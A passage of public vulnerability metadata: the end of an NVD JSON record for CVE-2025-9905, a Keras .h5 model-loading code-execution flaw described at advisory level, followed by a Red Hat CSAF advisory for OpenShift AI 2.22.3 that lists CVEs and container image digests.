"matchCriteriaId": "315FD6FA-C1F3-47FD-AE5D-DF4D556D657F",
"versionEndExcluding": "3.11.3",
"versionStartIncluding": "3.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The Keras Model.load_model\u00a0method can be exploited to achieve arbitrary code execution, even with safe_mode=True.\n\nOne can create a specially crafted .h5/.hdf5\u00a0model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.\n\nThis is achieved by crafting a special .h5\u00a0archive file that uses the Lambda\u00a0layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True\u00a0option is not honored when reading .h5\u00a0archives.\n\nNote that the .h5/.hdf5\u00a0format is a legacy format supported by Keras 3 for backwards compatibility."
}
],
"id": "CVE-2025-9905",
"lastModified": "2025-09-23T16:53:40.050",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.3,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "HIGH",
"attackRequirements": "PRESENT",
"attackVector": "LOCAL",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cve-coordination@google.com",
"type": "Secondary"
}
]
},
"published": "2025-09-19T09:15:36.033",
"references": [
{
"source": "cve-coordination@google.com",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/keras-team/keras/pull/21602"
},
{
"source": "cve-coordination@google.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv"
}
],
"sourceIdentifier": "cve-coordination@google.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-913"
}
],
"source": "cve-coordination@google.com",
"type": "Secondary"
}
]
}
RHSA-2025:22759
Vulnerability from csaf_redhat - Published: 2025-12-04 13:06 - Updated: 2025-12-04 17:10Summary
Red Hat Security Advisory: RHOAI 2.22.3 - Red Hat OpenShift AI
Notes
Topic
Updated images are now available for Red Hat OpenShift AI.
Details
Release of RHOAI 2.22.3 provides these changes:
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Updated images are now available for Red Hat OpenShift AI.",
"title": "Topic"
},
{
"category": "general",
"text": "Release of RHOAI 2.22.3 provides these changes:",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2025:22759",
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-12060",
"url": "https://access.redhat.com/security/cve/CVE-2025-12060"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-47907",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-53643",
"url": "https://access.redhat.com/security/cve/CVE-2025-53643"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-58183",
"url": "https://access.redhat.com/security/cve/CVE-2025-58183"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-58754",
"url": "https://access.redhat.com/security/cve/CVE-2025-58754"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-62156",
"url": "https://access.redhat.com/security/cve/CVE-2025-62156"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-62727",
"url": "https://access.redhat.com/security/cve/CVE-2025-62727"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-9905",
"url": "https://access.redhat.com/security/cve/CVE-2025-9905"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"url": "https://docs.redhat.com/en/documentation/red_hat_openshift_ai/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_22759.json"
}
],
"title": "Red Hat Security Advisory: RHOAI 2.22.3 - Red Hat OpenShift AI",
"tracking": {
"current_release_date": "2025-12-04T17:10:56+00:00",
"generator": {
"date": "2025-12-04T17:10:56+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.13"
}
},
"id": "RHSA-2025:22759",
"initial_release_date": "2025-12-04T13:06:08+00:00",
"revision_history": [
{
"date": "2025-12-04T13:06:08+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2025-12-04T13:06:21+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-12-04T17:10:56+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift AI 2.22",
"product": {
"name": "Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_ai:2.22::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift AI"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"product_id": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-codeflare-operator-rhel9@sha256%3A8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764593039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"product_id": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-dashboard-rhel9@sha256%3A7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764637896"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"product_id": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-data-science-pipelines-argo-argoexec-rhel9@sha256%3A86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764181290"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"product_id": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256%3Ac7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764181290"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"product_id": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-data-science-pipelines-operator-controller-rhel9@sha256%3Af27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609238"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"product_id": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-feast-operator-rhel9@sha256%3A3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1763051808"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"product_id": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-feature-server-rhel9@sha256%3Ad5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1763565765"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"product_id": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-kf-notebook-controller-rhel9@sha256%3A687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609614"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"product_id": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-kuberay-operator-controller-rhel9@sha256%3A2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609723"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"product_id": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-kueue-controller-rhel9@sha256%3Ab7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609729"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-api-server-v2-rhel9@sha256%3A854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-driver-rhel9@sha256%3Af092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-launcher-rhel9@sha256%3A46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256%3A3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-runtime-generic-rhel9@sha256%3A65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764293130"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256%3A8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"product_id": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-mlmd-grpc-server-rhel9@sha256%3Abfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594262"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"product_id": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-mm-rest-proxy-rhel9@sha256%3A974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594154"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"product_id": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-controller-rhel9@sha256%3A65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764665999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"product_id": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-registry-operator-rhel9@sha256%3A901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594440"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"product_id": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-registry-rhel9@sha256%3Ae0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594496"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"product_id": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-modelmesh-runtime-adapter-rhel9@sha256%3A1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594508"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"product_id": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-modelmesh-serving-controller-rhel9@sha256%3A4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594518"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"product_id": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-modelmesh-rhel9@sha256%3Aa3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594760"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"product_id": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-notebook-controller-rhel9@sha256%3Ae940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609614"
}
}
},
{
"category": "product_version",
